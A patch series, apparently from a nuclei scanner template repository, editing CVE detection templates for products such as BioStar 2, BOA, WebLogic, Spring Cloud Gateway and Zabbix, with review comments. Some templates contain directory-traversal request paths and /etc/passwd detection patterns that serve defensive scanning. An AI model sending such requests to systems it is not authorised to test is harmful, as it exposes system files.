Subject: [PATCH 082/259] Update CVE-2022-25323.yaml
---
cves/2022/CVE-2022-25323.yaml | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/cves/2022/CVE-2022-25323.yaml b/cves/2022/CVE-2022-25323.yaml
index 9862f10447..4500863480 100644
--- a/cves/2022/CVE-2022-25323.yaml
+++ b/cves/2022/CVE-2022-25323.yaml
@@ -4,7 +4,7 @@ info:
name: ZEROF Web Server 2.0 Cross-Site Scripting
author: pikpikcu
severity: medium
- description: ZEROF Web Server 2.0 allows /admin.back cross-site scripting.
+ description: ZEROF Web Server 2.0 allows /admin.back cross-site scripting.
reference:
- https://github.com/awillix/research/blob/main/cve/CVE-2022-25323.md
- https://nvd.nist.gov/vuln/detail/CVE-2022-25323
From f0eedd20b4f67b4fc4cc9969ab56bb17bef916d4 Mon Sep 17 00:00:00 2001
From: GitHub Action
Date: Tue, 8 Mar 2022 01:30:21 +0000
Subject: [PATCH 083/259] Auto Generated New Template Addition List [Tue Mar 8
01:30:21 UTC 2022] :robot:
---
.new-additions | 1 +
1 file changed, 1 insertion(+)
diff --git a/.new-additions b/.new-additions
index c749ffc502..1ac6e15e74 100644
--- a/.new-additions
+++ b/.new-additions
@@ -1,6 +1,7 @@
cves/2021/CVE-2021-3002.yaml
cves/2022/CVE-2022-0381.yaml
cves/2022/CVE-2022-23779.yaml
+cves/2022/CVE-2022-24990.yaml
default-logins/digitalrebar/digitalrebar-default-login.yaml
exposed-panels/kentico-login.yaml
vulnerabilities/vmware/vrealize-operations-log4j-rce.yaml
From f0d3116b12a353e95aaf0991b8751d80b3b1705e Mon Sep 17 00:00:00 2001
From: sandeep
Date: Tue, 8 Mar 2022 07:00:33 +0530
Subject: [PATCH 084/259] added metadata
---
cves/2022/CVE-2022-24990.yaml | 9 +++++----
1 file changed, 5 insertions(+), 4 deletions(-)
diff --git a/cves/2022/CVE-2022-24990.yaml b/cves/2022/CVE-2022-24990.yaml
index 9163b8bac3..2fabe04c31 100644
--- a/cves/2022/CVE-2022-24990.yaml
+++ b/cves/2022/CVE-2022-24990.yaml
@@ -7,9 +7,10 @@ info:
description: |
TerraMaster NAS devices running TOS prior to version
4.2.30 is vulnerable to information disclosure
- reference:
- - https://octagon.net/blog/2022/03/07/cve-2022-24990-terrmaster-tos-unauthenticated-remote-command-execution-via-php-object-instantiation/
- tags: cve,cve2022,terramaster,disclosure
+ reference: https://octagon.net/blog/2022/03/07/cve-2022-24990-terrmaster-tos-unauthenticated-remote-command-execution-via-php-object-instantiation/
+ metadata:
+ shodan-query: TerraMaster
+ tags: cve,cve2022,terramaster,exposure
requests:
- method: GET
@@ -37,4 +38,4 @@ requests:
- "webNasIPS successful"
- "(ADDR|(IFC|PWD|[DS]AT)):"
- "\"((firmware|(version|ma(sk|c)|port|url|ip))|hostname)\":" # cherry pick
- condition: or
+ condition: or
\ No newline at end of file
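Review bot: The hunk ends with `\ No newline at end of file`, i.e. this commit removes the trailing newline that the rest of the series is adding back to other templates; the file should end with a single newline. Collapsing `reference:` from a one-element list to a scalar works for nuclei but differs from the list form every other template in this series uses; either is valid, but pick one for the repository.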
From f6af104d37f39207826bb394c8166acbc0435f13 Mon Sep 17 00:00:00 2001
From: Prince Chaddha
Date: Tue, 8 Mar 2022 11:03:36 +0530
Subject: [PATCH 086/259] Update kibana-panel.yaml
---
exposed-panels/kibana-panel.yaml | 2 ++
1 file changed, 2 insertions(+)
diff --git a/exposed-panels/kibana-panel.yaml b/exposed-panels/kibana-panel.yaml
index 74bef2b479..fc3bc7f490 100644
--- a/exposed-panels/kibana-panel.yaml
+++ b/exposed-panels/kibana-panel.yaml
@@ -22,6 +22,8 @@ requests:
words:
- "Kibana"
- "Elastic"
+ - "Kibana Login"
+ condition: or
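Review bot: Adding `Kibana Login` to a word matcher with `condition: or` changes nothing, because any body containing `Kibana Login` already contains `Kibana`, the first word in the list, and nuclei's word matcher defaults to `or` anyway, so the explicit `condition: or` is a no-op as well. If the intent was to tighten detection, the stricter form is `condition: and` over `Kibana` and `Kibana Login`, or simply drop the redundant word. `Elastic` alone under `or` matches any page that mentions the company, so the header regex matcher cut off at the end of the hunk is doing the real work; confirm `matchers-condition: and` is set above this hunk.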
- type: regex
part: header
From e14b913101f214f160db0f57eea300ac4e9de8ab Mon Sep 17 00:00:00 2001
From: Prince Chaddha
Date: Tue, 8 Mar 2022 11:12:39 +0530
Subject: [PATCH 087/259] Update CVE-2020-15050.yaml
---
cves/2020/CVE-2020-15050.yaml | 7 ++++---
1 file changed, 4 insertions(+), 3 deletions(-)
diff --git a/cves/2020/CVE-2020-15050.yaml b/cves/2020/CVE-2020-15050.yaml
index 3fc4b0f9ba..c3a0c4953d 100644
--- a/cves/2020/CVE-2020-15050.yaml
+++ b/cves/2020/CVE-2020-15050.yaml
@@ -7,23 +7,24 @@ info:
description: An issue was discovered in the Video Extension in Suprema BioStar 2 before 2.8.2. Remote attackers can read arbitrary files from the server via Directory Traversal.
reference:
- http://packetstormsecurity.com/files/158576/Bio-Star-2.8.2-Local-File-Inclusion.html
+ - https://www.supremainc.com/en/support/biostar-2-pakage.asp
- https://nvd.nist.gov/vuln/detail/CVE-2020-15050
- tags: cve,cve2020,lfi,suprema,biostar2
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 7.50
cve-id: CVE-2020-15050
+ tags: cve,cve2020,lfi,suprema,biostar2
requests:
- method: GET
path:
- - "{{BaseURL}}/../../../../../../../../../../../../windows/win.in"
+ - "{{BaseURL}}/../../../../../../../../../../../../windows/win.ini"
matchers:
- type: word
+ part: body
words:
- "bit app support"
- "fonts"
- "extensions"
condition: and
- part: body
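Review bot: The corrected `windows/win.ini` path only proves the traversal on Windows hosts, and the three-word `and` matcher (`bit app support`, `fonts`, `extensions`) is tied to that file, so a BioStar 2 install on any other platform would never match; if the product is Windows-only that is fine, otherwise add an `/etc/passwd` path with a `root:.*:0:0` regex and `matchers-condition: or`. The description calls the issue a directory traversal that reads arbitrary files while the tag says `lfi`; the template reads a file rather than including it, so `lfr` (as used in the CVE-2017-9833 rename later in this series) is the more accurate tag.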
From ec28b289119c3bd0eb040756b05dec741a626c0d Mon Sep 17 00:00:00 2001
From: GitHub Action
Date: Tue, 8 Mar 2022 05:47:58 +0000
Subject: [PATCH 088/259] Auto Generated New Template Addition List [Tue Mar 8
05:47:58 UTC 2022] :robot:
---
.new-additions | 1 +
1 file changed, 1 insertion(+)
diff --git a/.new-additions b/.new-additions
index 1ac6e15e74..198323ba40 100644
--- a/.new-additions
+++ b/.new-additions
@@ -1,3 +1,4 @@
+cves/2020/CVE-2020-15050.yaml
cves/2021/CVE-2021-3002.yaml
cves/2022/CVE-2022-0381.yaml
cves/2022/CVE-2022-23779.yaml
From 61d50b83574f9deace0742d813345beb225c9bba Mon Sep 17 00:00:00 2001
From: GitHub Action
Date: Tue, 8 Mar 2022 06:20:08 +0000
Subject: [PATCH 089/259] Auto Generated New Template Addition List [Tue Mar 8
06:20:08 UTC 2022] :robot:
---
.new-additions | 1 +
1 file changed, 1 insertion(+)
diff --git a/.new-additions b/.new-additions
index 198323ba40..dab23f98f9 100644
--- a/.new-additions
+++ b/.new-additions
@@ -1,3 +1,4 @@
+boa-web-fileread.yaml
cves/2020/CVE-2020-15050.yaml
cves/2021/CVE-2021-3002.yaml
cves/2022/CVE-2022-0381.yaml
From 44f96f31158cc5a48aea6636c571a5d7ca574126 Mon Sep 17 00:00:00 2001
From: Prince Chaddha
Date: Tue, 8 Mar 2022 11:51:07 +0530
Subject: [PATCH 090/259] Update and rename boa-web-fileread.yaml to
cves/2017/CVE-2017-9833.yaml
---
boa-web-fileread.yaml => cves/2017/CVE-2017-9833.yaml | 5 ++---
1 file changed, 2 insertions(+), 3 deletions(-)
rename boa-web-fileread.yaml => cves/2017/CVE-2017-9833.yaml (94%)
diff --git a/boa-web-fileread.yaml b/cves/2017/CVE-2017-9833.yaml
similarity index 94%
rename from boa-web-fileread.yaml
rename to cves/2017/CVE-2017-9833.yaml
index fa74016601..d6de011f4a 100644
--- a/boa-web-fileread.yaml
+++ b/cves/2017/CVE-2017-9833.yaml
@@ -1,4 +1,4 @@
-id: boa-web-fileRead
+id: CVE-2017-9833
info:
name: BOA Web Server 0.94.14 - Access to arbitrary files as privileges
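Review bot: The name `BOA Web Server 0.94.14 - Access to arbitrary files as privileges` (context line under the new `id:`) is not English a reader can act on; the CWE-22 classification and the `root:[x*]:0:0` regex in the last hunk show this is an arbitrary file read, so rename it `name: BOA Web Server 0.94.14 - Arbitrary File Read`. The regex matcher in the last hunk should also carry `part: body` if it does not already (the listing may have dropped a line there), so a header can never satisfy it. The request block sits between the hunks and is not visible here.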
@@ -8,7 +8,7 @@ info:
reference:
- https://www.exploit-db.com/exploits/42290
- https://www.cvedetails.com/cve/CVE-2017-9833
- tags: boa,fileread,lfi
+ tags: boa,lfr,lfi,cve,cve2017
requests:
- method: GET
@@ -17,7 +17,6 @@ requests:
matchers-condition: and
matchers:
-
- type: regex
regex:
- "root:[x*]:0:0"
From 3fd34746efe5b05b74cb38c9642e4223bf8aa023 Mon Sep 17 00:00:00 2001
From: GitHub Action
Date: Tue, 8 Mar 2022 06:53:03 +0000
Subject: [PATCH 092/259] Auto Generated New Template Addition List [Tue Mar 8
06:53:03 UTC 2022] :robot:
---
.new-additions | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/.new-additions b/.new-additions
index dab23f98f9..158dc1c7a3 100644
--- a/.new-additions
+++ b/.new-additions
@@ -1,4 +1,4 @@
-boa-web-fileread.yaml
+cves/2017/CVE-2017-9833.yaml
cves/2020/CVE-2020-15050.yaml
cves/2021/CVE-2021-3002.yaml
cves/2022/CVE-2022-0381.yaml
From a85cb6354e3c3d4d9b52d766df70c40f6860dac2 Mon Sep 17 00:00:00 2001
From: GitHub Action
Date: Tue, 8 Mar 2022 06:53:29 +0000
Subject: [PATCH 093/259] Auto Generated CVE annotations [Tue Mar 8 06:53:29
UTC 2022] :robot:
---
cves/2017/CVE-2017-9833.yaml | 5 +++++
1 file changed, 5 insertions(+)
diff --git a/cves/2017/CVE-2017-9833.yaml b/cves/2017/CVE-2017-9833.yaml
index d6de011f4a..32ba227b0b 100644
--- a/cves/2017/CVE-2017-9833.yaml
+++ b/cves/2017/CVE-2017-9833.yaml
@@ -9,6 +9,11 @@ info:
- https://www.exploit-db.com/exploits/42290
- https://www.cvedetails.com/cve/CVE-2017-9833
tags: boa,lfr,lfi,cve,cve2017
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+ cvss-score: 7.50
+ cve-id: CVE-2017-9833
+ cwe-id: CWE-22
requests:
- method: GET
From b6e96c73a87e8affa10d159284a5556c6f080ca3 Mon Sep 17 00:00:00 2001
From: MostInterestingBotInTheWorld
<98333686+MostInterestingBotInTheWorld@users.noreply.github.com>
Date: Tue, 8 Mar 2022 09:58:58 -0500
Subject: [PATCH 095/259] Enhancement: cves/2022/CVE-2022-21371.yaml by mp
---
cves/2022/CVE-2022-21371.yaml | 7 +++++--
1 file changed, 5 insertions(+), 2 deletions(-)
diff --git a/cves/2022/CVE-2022-21371.yaml b/cves/2022/CVE-2022-21371.yaml
index ba91d44289..05d2b3a606 100644
--- a/cves/2022/CVE-2022-21371.yaml
+++ b/cves/2022/CVE-2022-21371.yaml
@@ -1,11 +1,12 @@
id: CVE-2022-21371
info:
- name: Oracle WebLogic Server LFI
+ name: Oracle WebLogic Server Local File Inclusion
author: paradessia,narluin
severity: high
- description: Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware. Supported versions that are affected are 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle WebLogic Server accessible data. CVSS 3.1 Base Score 7.5 (Confidentiality impacts).
+ description: An easily exploitable local file inclusion vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle WebLogic Server. Supported versions that are affected are 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle WebLogic Server accessible data.
reference:
+ - https://www.oracle.com/security-alerts/cpujan2022.html
- https://nvd.nist.gov/vuln/detail/CVE-2022-21371
- https://gist.github.com/picar0jsu/f3e32939153e4ced263d3d0c79bd8786
classification:
@@ -45,3 +46,5 @@ requests:
- type: status
status:
- 200
+
+# Enhanced by mp on 2022/03/08
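Review bot: The rewritten `+ description:` drops the CVSS score sentence, which is fine only if the `classification:` block that follows the hunk carries `cvss-score`; confirm it does. With the Oracle January 2022 CPU advisory now first in the reference list, the template can state the fix directly: `remediation: Apply the Oracle Critical Patch Update for January 2022.` The request and matchers lie between the two hunks.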
From f15357f415c01a864fafd317b541feb14c837b23 Mon Sep 17 00:00:00 2001
From: MostInterestingBotInTheWorld
<98333686+MostInterestingBotInTheWorld@users.noreply.github.com>
Date: Tue, 8 Mar 2022 10:03:35 -0500
Subject: [PATCH 096/259] Enhancement: cves/2022/CVE-2022-0692.yaml by mp
---
cves/2022/CVE-2022-0692.yaml | 6 ++++--
1 file changed, 4 insertions(+), 2 deletions(-)
diff --git a/cves/2022/CVE-2022-0692.yaml b/cves/2022/CVE-2022-0692.yaml
index d4817c0ab5..ea0605c14f 100644
--- a/cves/2022/CVE-2022-0692.yaml
+++ b/cves/2022/CVE-2022-0692.yaml
@@ -4,7 +4,7 @@ info:
name: Rudloff alltube prior to 3.0.1 - Open Redirect
author: 0x_Akoko
severity: medium
- description: Open Redirect on Rudloff/alltube in Packagist rudloff/alltube prior to 3.0.1
+ description: "An open redirect vulnerability exists in Rudloff/alltube that could let an attacker construct a URL within the application that causes redirection to an arbitrary external domain via Packagist rudloff/alltube in versions prior to 3.0.1."
reference:
- https://huntr.dev/bounties/4fb39400-e08b-47af-8c1f-5093c9a51203/
- https://www.cvedetails.com/cve/CVE-2022-0692
@@ -24,4 +24,6 @@ requests:
- type: regex
part: header
regex:
- - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
\ No newline at end of file
+ - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
+
+# Enhanced by mp on 2022/03/08
From d0be94c1854938ac63edbbeaa0201b1c84d0413f Mon Sep 17 00:00:00 2001
From: MostInterestingBotInTheWorld
<98333686+MostInterestingBotInTheWorld@users.noreply.github.com>
Date: Tue, 8 Mar 2022 10:09:38 -0500
Subject: [PATCH 097/259] Enhancement: cves/2022/CVE-2022-22536.yaml by mp
---
cves/2022/CVE-2022-22536.yaml | 6 ++++--
1 file changed, 4 insertions(+), 2 deletions(-)
diff --git a/cves/2022/CVE-2022-22536.yaml b/cves/2022/CVE-2022-22536.yaml
index 171684f17d..e307de2556 100644
--- a/cves/2022/CVE-2022-22536.yaml
+++ b/cves/2022/CVE-2022-22536.yaml
@@ -1,10 +1,10 @@
id: CVE-2022-22536
info:
- name: SAP Memory Pipes(MPI) Desynchronization
+ name: SAP Memory Pipes (MPI) Desynchronization
author: pdteam
severity: critical
- description: SAP NetWeaver Application Server ABAP, SAP NetWeaver Application Server Java, ABAP Platform, SAP Content Server 7.53 and SAP Web Dispatcher are vulnerable for request smuggling and request concatenation. An unauthenticated attacker can prepend a victim's request with arbitrary data. This way, the attacker can execute functions impersonating the victim or poison intermediary Web caches. A successful attack could result in complete compromise of Confidentiality, Integrity and Availability of the system.
+ description: SAP NetWeaver Application Server ABAP, SAP NetWeaver Application Server Java, ABAP Platform, SAP Content Server 7.53 and SAP Web Dispatcher are vulnerable to request smuggling and request concatenation attacks. An unauthenticated attacker can prepend a victim's request with arbitrary data. This way, the attacker can execute functions impersonating the victim or poison intermediary Web caches. A successful attack could result in complete compromise of Confidentiality, Integrity and Availability of the system.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2022-22536
- https://wiki.scn.sap.com/wiki/display/PSR/SAP+Security+Patch+Day+-+February+2022
@@ -57,3 +57,5 @@ requests:
- "HTTP/1.0 500 Internal Server Error"
- "HTTP/1.0 500 Dispatching Error"
condition: or
+
+# Enhanced by mp on 2022/03/08
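Review bot: The description now lists five affected SAP products and a full-compromise impact but the template still has no `remediation:`; the SAP Patch Day reference already listed supports `remediation: Apply the fixes published in the SAP Security Patch Day of February 2022 for the affected components.` The word matcher at the end of the hunk accepts `HTTP/1.0 500 Internal Server Error` on its own, which an unrelated backend can return; that is only a desync signal together with the raw request and any preceding matchers, which lie above this hunk, so check they narrow it.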
From dd2d5259895b5acfe80e6f9d51dfff79d6bd5f48 Mon Sep 17 00:00:00 2001
From: MostInterestingBotInTheWorld
<98333686+MostInterestingBotInTheWorld@users.noreply.github.com>
Date: Tue, 8 Mar 2022 10:15:40 -0500
Subject: [PATCH 098/259] Enhancement: cves/2022/CVE-2022-22947.yaml by mp
---
cves/2022/CVE-2022-22947.yaml | 9 +++++++--
1 file changed, 7 insertions(+), 2 deletions(-)
diff --git a/cves/2022/CVE-2022-22947.yaml b/cves/2022/CVE-2022-22947.yaml
index 58c5abcf4a..c02886515d 100644
--- a/cves/2022/CVE-2022-22947.yaml
+++ b/cves/2022/CVE-2022-22947.yaml
@@ -4,13 +4,16 @@ info:
name: Spring Cloud Gateway Code Injection
author: pdteam
severity: critical
- description: Applications using Spring Cloud Gateway are vulnerable to a code injection attack when the Gateway Actuator endpoint is enabled, exposed and unsecured. A remote attacker could make a maliciously crafted request that could allow arbitrary remote execution on the remote host.
+ description: "Applications using Spring Cloud Gateway prior to 3.1.1+ and 3.0.7+ are vulnerable to a code injection attack when the Gateway Actuator endpoint is enabled, exposed and unsecured. A remote attacker could make a maliciously crafted request that could allow arbitrary remote execution on the remote host."
reference:
+ - https://nvd.nist.gov/vuln/detail/CVE-2022-22947
- https://wya.pl/2022/02/26/cve-2022-22947-spel-casting-and-evil-beans/
- https://github.com/wdahlenburg/spring-gateway-demo
- https://spring.io/blog/2022/03/01/spring-cloud-gateway-cve-reports-published
- https://tanzu.vmware.com/security/cve-2022-22947
tags: cve,cve2022,apache,spring,vmware,actuator,oast
+ classification:
+ cve-id: CVE-2022-22947
requests:
- raw:
@@ -74,4 +77,6 @@ requests:
- type: word
part: interactsh_protocol
words:
- - "dns"
\ No newline at end of file
+ - "dns"
+
+# Enhanced by mp on 2022/03/08
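Review bot: `prior to 3.1.1+ and 3.0.7+` on the `+ description:` line reads as a contradiction ("prior to" a version "or later"); the intent is that 3.1.1 and 3.0.7 are the fixed releases, so say that: `description: Applications using Spring Cloud Gateway 3.1.0, or 3.0.x before 3.0.7, are vulnerable to code injection when the Gateway Actuator endpoint is enabled, exposed and unsecured. ...` and add `remediation: Upgrade to Spring Cloud Gateway 3.1.1 or 3.0.7, or disable or secure the actuator endpoint.` — confirm the affected ranges against the Spring blog reference before committing them. The new `classification:` carries only `cve-id`; with the NVD reference now added it should also have `cvss-metrics`, `cvss-score` and `cwe-id`.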
From 613ff3f1eb2c004192cb8eed3b27e942ad824c64 Mon Sep 17 00:00:00 2001
From: MostInterestingBotInTheWorld
<98333686+MostInterestingBotInTheWorld@users.noreply.github.com>
Date: Tue, 8 Mar 2022 10:28:19 -0500
Subject: [PATCH 099/259] Enhancement: cves/2022/CVE-2022-23131.yaml by mp
---
cves/2022/CVE-2022-23131.yaml | 5 +++--
1 file changed, 3 insertions(+), 2 deletions(-)
diff --git a/cves/2022/CVE-2022-23131.yaml b/cves/2022/CVE-2022-23131.yaml
index 9634717d62..86f675074b 100644
--- a/cves/2022/CVE-2022-23131.yaml
+++ b/cves/2022/CVE-2022-23131.yaml
@@ -5,6 +5,7 @@ info:
author: For3stCo1d
severity: critical
description: When SAML SSO authentication is enabled (non-default), session data can be modified by a malicious actor because a user login stored in the session was not verified.
+ remediation: Upgrade to 5.4.9rc2, 6.0.0beta1, 6.0 (plan) or higher.
reference:
- https://support.zabbix.com/browse/ZBX-20350
- https://blog.sonarsource.com/zabbix-case-study-of-unsafe-session-storage
@@ -12,7 +13,7 @@ info:
- https://github.com/1mxml/CVE-2022-23131
metadata:
shodan-query: http.favicon.hash:892542951
- fofa-query: app="ZABBIX-监控系统" && body="saml"
+ fofa-query: app="ZABBIX-çæ§ç³»ç»" && body="saml"
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
cvss-score: 9.8
@@ -39,4 +40,4 @@ requests:
dsl:
- "contains(tolower(all_headers), 'location: zabbix.php?action=dashboard.view')"
-# Enhanced by mp on 2022/02/28
+# Enhanced by mp on 2022/03/08
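Review bot: The `+ fofa-query:` line replaces the Chinese app name `ZABBIX-监控系统` with mojibake (`çæ§ç³»ç»`), the signature of UTF-8 bytes re-read as Latin-1, so the query no longer matches anything on FOFA; restore `fofa-query: app="ZABBIX-监控系统" && body="saml"` and make sure the editing tool writes the file as UTF-8. The added remediation copies the ZBX ticket's "Fix version" wording including `6.0 (plan)`; for a template reader `remediation: Upgrade to Zabbix 5.4.9 or 6.0.0 (fixed in 5.4.9rc2 and 6.0.0beta1) or later.` is clearer — confirm the release versions against ZBX-20350.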
From bba904ea87a91f60389e37ec61381395ef8b9672 Mon Sep 17 00:00:00 2001
From: idealphase
Date: Tue, 8 Mar 2022 22:29:09 +0700
Subject: [PATCH 100/259] Updated jamf-panel.yaml
Add jamf pro version extractor
---
exposed-panels/jamf-panel.yaml | 9 ++++++++-
1 file changed, 8 insertions(+), 1 deletion(-)
diff --git a/exposed-panels/jamf-panel.yaml b/exposed-panels/jamf-panel.yaml
index aeffbaed7a..f0e7d9dafe 100644
--- a/exposed-panels/jamf-panel.yaml
+++ b/exposed-panels/jamf-panel.yaml
@@ -22,4 +22,11 @@ requests:
words:
- "Jamf Pro Login"
- "Jamf Cloud Node"
- condition: or
\ No newline at end of file
+ condition: or
+
+ extractors:
+ - type: regex
+ part: body
+ group: 1
+ regex:
+ - ''
From 6267ad4fad272b17a250301c55fb3e2cfc203be8 Mon Sep 17 00:00:00 2001
From: idealphase
Date: Tue, 8 Mar 2022 22:32:21 +0700
Subject: [PATCH 101/259] Updated jamf-panel.yaml
Add my name to the author list
---
exposed-panels/jamf-panel.yaml | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/exposed-panels/jamf-panel.yaml b/exposed-panels/jamf-panel.yaml
index f0e7d9dafe..848da57aec 100644
--- a/exposed-panels/jamf-panel.yaml
+++ b/exposed-panels/jamf-panel.yaml
@@ -2,7 +2,7 @@ id: jamf-panel
info:
name: JAMF MDM Panel
- author: pdteam
+ author: pdteam,idealphase
severity: info
metadata:
shodan-query: http.favicon.hash:1262005940
From 303f6f71c64706954357542a5b19f8916ad518a2 Mon Sep 17 00:00:00 2001
From: MostInterestingBotInTheWorld
<98333686+MostInterestingBotInTheWorld@users.noreply.github.com>
Date: Tue, 8 Mar 2022 10:36:27 -0500
Subject: [PATCH 102/259] Enhancement: cves/2022/CVE-2022-23134.yaml by mp
---
cves/2022/CVE-2022-23134.yaml | 6 ++++--
1 file changed, 4 insertions(+), 2 deletions(-)
diff --git a/cves/2022/CVE-2022-23134.yaml b/cves/2022/CVE-2022-23134.yaml
index b62dd45721..5df57e33c8 100644
--- a/cves/2022/CVE-2022-23134.yaml
+++ b/cves/2022/CVE-2022-23134.yaml
@@ -4,7 +4,7 @@ info:
name: Zabbix Setup Configuration - Unauthenticated Access
author: bananabr
severity: medium
- description: After the initial setup process, some steps of setup.php file are reachable not only by super-administrators, but by unauthenticated users as well. Malicious actor can pass step checks and potentially change the configuration of Zabbix Frontend.
+ description: After the initial setup process, some steps of setup.php file are reachable not only by super-administrators but also by unauthenticated users. A malicious actor can pass step checks and potentially change the configuration of Zabbix Frontend.
reference:
- https://blog.sonarsource.com/zabbix-case-study-of-unsafe-session-storage
- https://nvd.nist.gov/vuln/detail/CVE-2022-23134
@@ -36,4 +36,6 @@ requests:
- type: status
status:
- - 200
\ No newline at end of file
+ - 200
+
+# Enhanced by mp on 2022/03/08
From c2fba36a7a69f07f0016603b959b0516886dce56 Mon Sep 17 00:00:00 2001
From: MostInterestingBotInTheWorld
<98333686+MostInterestingBotInTheWorld@users.noreply.github.com>
Date: Tue, 8 Mar 2022 10:41:08 -0500
Subject: [PATCH 103/259] Enhancement: cves/2022/CVE-2022-23944.yaml by mp
---
cves/2022/CVE-2022-23944.yaml | 9 ++++++---
1 file changed, 6 insertions(+), 3 deletions(-)
diff --git a/cves/2022/CVE-2022-23944.yaml b/cves/2022/CVE-2022-23944.yaml
index 94a797ab85..8fce813a89 100644
--- a/cves/2022/CVE-2022-23944.yaml
+++ b/cves/2022/CVE-2022-23944.yaml
@@ -1,12 +1,13 @@
id: CVE-2022-23944
info:
- name: ShenYu Admin Unauth Access
+ name: Apache ShenYu Admin Unauth Access
author: cckuakilong
severity: medium
- description: User can access /plugin api without authentication. This issue affected Apache ShenYu 2.4.0 and 2.4.1.
+ description: "Apache ShenYu suffers from an unauthorized access vulnerability where a user can access /plugin api without authentication. This issue affected Apache ShenYu 2.4.0 and 2.4.1."
+ remediation: Upgrade to Apache ShenYu (incubating) 2.4.2 or apply the appropriate patch.
reference:
- - https://github.com/apache/incubator-shenyu/pull/2462/files
+ - https://github.com/apache/incubator-shenyu/pull/2462
- https://nvd.nist.gov/vuln/detail/CVE-2022-23944
- https://github.com/cckuailong/reapoc/blob/main/2022/CVE-2022-23944/vultarget/README.md
classification:
@@ -31,3 +32,5 @@ requests:
- type: status
status:
- 200
+
+# Enhanced by mp on 2022/03/08
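Review bot: The name still abbreviates `Unauth Access` while the sibling template touched in this series (`Zabbix Setup Configuration - Unauthenticated Access`) spells it out; use `name: Apache ShenYu Admin - Unauthenticated Access` for consistency with the names being normalized here. The added `remediation:` and the PR link without the `/files` suffix are good. The request and body matchers lie between the hunks.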
From 1ce8284cbe1324c24458732faf6380c6d77f3197 Mon Sep 17 00:00:00 2001
From: MostInterestingBotInTheWorld
<98333686+MostInterestingBotInTheWorld@users.noreply.github.com>
Date: Tue, 8 Mar 2022 10:51:53 -0500
Subject: [PATCH 104/259] Enhancement: cves/2022/CVE-2022-24112.yaml by mp
---
cves/2022/CVE-2022-24112.yaml | 7 +++++--
1 file changed, 5 insertions(+), 2 deletions(-)
diff --git a/cves/2022/CVE-2022-24112.yaml b/cves/2022/CVE-2022-24112.yaml
index 7922f87e59..eb82122e33 100644
--- a/cves/2022/CVE-2022-24112.yaml
+++ b/cves/2022/CVE-2022-24112.yaml
@@ -1,8 +1,9 @@
id: CVE-2022-24112
info:
- name: Apache APISIX apisix/batch-requests RCE
- description: Apache APISIX apisix/batch-requests plugin allows overwriting the X-REAL-IP header to RCE;An attacker can abuse the batch-requests plugin to send requests to bypass the IP restriction of Admin API. A default configuration of Apache APISIX (with default API key) is vulnerable to remote code execution. When the admin key was changed or the port of Admin API was changed to a port different from the data panel, the impact is lower. But there is still a risk to bypass the IP restriction of Apache APISIX's data panel. There is a check in the batch-requests plugin which overrides the client IP with its real remote IP. But due to a bug in the code, this check can be bypassed.
+ name: Apache APISIX apisix/batch-requests Remote Code Execution
+ description: "A default configuration of Apache APISIX (with default API key) is vulnerable to remote code execution. An Apache APISIX apisix/batch-requests plugin allows overwriting the X-REAL-IP header to RCE. An attacker can abuse the batch-requests plugin to send requests to bypass the IP restriction of Admin API. When the admin key was changed or the port of Admin API was changed to a port different from the data panel, the impact is lower. But there is still a risk to bypass the IP restriction of Apache APISIX's data panel. There is a check in the batch-requests plugin which overrides the client IP with its real remote IP. But due to a bug in the code, this check can be bypassed."
+ remediation: "Upgrade to 2.10.4 or 2.12.1. Or, explicitly configure the enabled plugins in `conf/config.yaml` and ensure `batch-requests` is disabled. (Or just comment out `batch-requests` in `conf/config-default.yaml`)."
author: Mr-xn
severity: critical
reference:
@@ -75,3 +76,5 @@ requests:
group: 1
regex:
- 'GET \/([a-z-]+) HTTP'
+
+# Enhanced by mp on 2022/03/08
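Review bot: `allows overwriting the X-REAL-IP header to RCE` on the `+ description:` line is not a sentence and hides the mechanism that the rest of the description already gives: the batch-requests plugin's real-IP override can be bypassed, so a spoofed X-REAL-IP reaches the Admin API with the default key. Suggest `description: A default configuration of Apache APISIX (with the default Admin API key) is vulnerable to remote code execution. The batch-requests plugin is meant to override the client IP with the real remote IP, but a bug lets an attacker spoof the X-REAL-IP header and bypass the Admin API's IP restriction. ...` keeping the remaining sentences. The remediation is specific and good; the `group: 1` extractor at the end of the hunk pulls a path from `GET /([a-z-]+) HTTP`, presumably from the callback request, and a one-line comment saying what it captures would help.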
From 9004746e16c8fadfbf050e31fb3526b280ba9192 Mon Sep 17 00:00:00 2001
From: MostInterestingBotInTheWorld
<98333686+MostInterestingBotInTheWorld@users.noreply.github.com>
Date: Tue, 8 Mar 2022 10:54:16 -0500
Subject: [PATCH 105/259] Enhancement: cves/2022/CVE-2022-24124.yaml by mp
---
cves/2022/CVE-2022-24124.yaml | 7 +++++--
1 file changed, 5 insertions(+), 2 deletions(-)
diff --git a/cves/2022/CVE-2022-24124.yaml b/cves/2022/CVE-2022-24124.yaml
index 4e841d6d40..31aa5390ef 100644
--- a/cves/2022/CVE-2022-24124.yaml
+++ b/cves/2022/CVE-2022-24124.yaml
@@ -1,11 +1,12 @@
